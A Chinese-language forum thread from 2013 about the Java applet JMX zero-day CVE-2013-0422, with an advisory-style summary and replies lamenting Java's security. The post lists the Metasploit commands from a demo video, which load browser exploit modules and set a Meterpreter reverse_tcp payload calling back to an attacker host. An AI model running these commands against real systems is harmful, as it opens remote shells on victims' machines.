Java Applet JMX 0-Day 遠端執行代碼 (含影片示範)

z24374203

主題： Java Applet JMX 0-Day 遠端執行代碼 (含影片示範)

發佈日期：2013/01/10

影響版本：Oracle Java SE 7 Update 10 and bellow

漏洞編號：CVE-2013-0422

說明：
Java 又爆發漏洞@@我想這也不是一天二天的事了，Oracle 官方對安全漏洞的修補速度再遭爭議。
而這一次的漏洞，更是已經被知名駭客攻擊工具 Blackhole Exploit Kit (BHEK) 及 the Cool Exploit Kit (CEK) 所收入內建於其中，相信接下來會有更多層出不窮的Web攻擊發生。

建議：
Java SE 7 Update 8~10 有漏洞與 0-Day。
Java SE 5~6 更早就被挖出漏洞。參考：http://www.ithome.com.tw/itadm/article.php?c=76482
所以 Oracle 願意進一步更新前，暫時移除不用(有可能嗎？)或者自求多福！

其它參考網站說明：
http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html

影片內指令：
use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid

From
https://www.facebook.com/netwargame

divale

呵呵~看樣子只能等歐樂可發佈修正檔了
考驗該公司對安全漏洞修補的能力

發文竟會掉字，重po了好幾次

lmam.ou

這真的是杯具~~~
運用層面廣泛
但卻是漏洞連連~~~
Java的安全性要是沒有更好的解決方案~~~
遲早會成為歷史~~~

PS:youtube的示範影片~~~可以知道~~~"怎麼死的都不知道"!!!

userman

希望Oracle早日修補此漏洞
很多軟體須依考Java運作